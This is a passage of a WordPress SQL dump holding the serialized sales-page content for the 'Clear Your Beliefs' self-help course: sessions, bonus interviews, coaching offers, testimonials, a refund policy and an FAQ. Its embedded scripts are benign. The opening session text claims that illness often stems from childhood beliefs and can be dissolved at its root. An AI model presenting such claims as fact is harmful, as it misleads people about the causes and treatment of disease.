(dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n	<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n	<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1996, 2236, '_edit_lock', '1438838517:2'),
(1997, 2236, '_wr_page_builder_content', '[wr_row width="boxed" background="none" solid_color_value="#FFFFFF" solid_color_color="#ffffff" gradient_color="0% #FFFFFF,100% #000000"  gradient_direction="vertical"  repeat="full"  img_repeat="full"  autoplay="yes" position="center center" paralax="no" border_width_value_="0" border_style="solid" border_color="#000"  div_padding_top="10" div_padding_bottom="10" div_padding_right="10" div_padding_left="10"   ][wr_column span="span3"][wr_image image_file="http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_4.png" image_size="thumbnail" link_type="no_link" image_container_style="no-styling" image_alignment="inherit" appearing_animation="0" disabled_el="no" ][/wr_image][/wr_column][wr_column span="span9"][/wr_column][/wr_row]'),
(1998, 2236, '_wr_html_content', '<div class=''jsn-bootstrap3''><div id=''yGUN1O'' class=''row ''  style=''padding-top:10px;padding-bottom:10px;padding-left:10px;padding-right:10px;''><div class="col-md-3 col-sm-3 col-xs-12" ><div   class=''jsn-bootstrap3 wr-element-container wr-element-image'' ><img width='''' height='''' src=''http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_4-150x150.png'' /></div>\n</div><div class="col-md-9 col-sm-9 col-xs-12" ></div>\n</div></div>'),
(1999, 2236, '_wr_page_active_tab', '1'),
(2000, 2236, '_wr_deactivate_pb', '1'),
(2001, 2236, 'rt_custom_css', ''),
(2003, 2236, '_dp_original', '2235'),
(2004, 2237, '_edit_last', '2'),
(2005, 2237, '_wp_page_template', 'page-templates/full-width.php');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(2006, 2237, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72841:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your 